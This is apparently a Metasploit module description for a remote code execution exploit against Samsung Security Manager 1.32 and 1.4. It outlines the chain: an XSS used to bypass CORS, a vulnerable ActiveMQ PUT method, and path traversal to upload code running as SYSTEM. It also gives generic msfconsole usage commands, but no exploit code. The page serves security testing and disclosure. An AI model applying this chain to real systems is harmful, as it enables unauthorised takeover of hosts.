Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution
This is an exploit against Samsung Security Manager that bypasses the patch in ZDI-15-156 & ZDI-16-481 by exploiting the vulnerability against the client-side. This exploit has been tested successfully using IE, FireFox and Chrome by abusing a GET request XSS to bypass CORS and reach the vulnerable PUT. Finally a traversal is used in the PUT request to upload the code just where we want it and gain RCE as SYSTEM.
- mr_me <mr_me [at] offensive-security.com>
- Samsung Security Manager 1.32 & 1.4 Universal
To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':
msf > use exploit/windows/browser/samsung_security_manager_put msf exploit(samsung_security_manager_put) > show targets ...targets... msf exploit(samsung_security_manager_put) > set TARGET <target-id> msf exploit(samsung_security_manager_put) > show options ...show and set options... msf exploit(samsung_security_manager_put) > exploit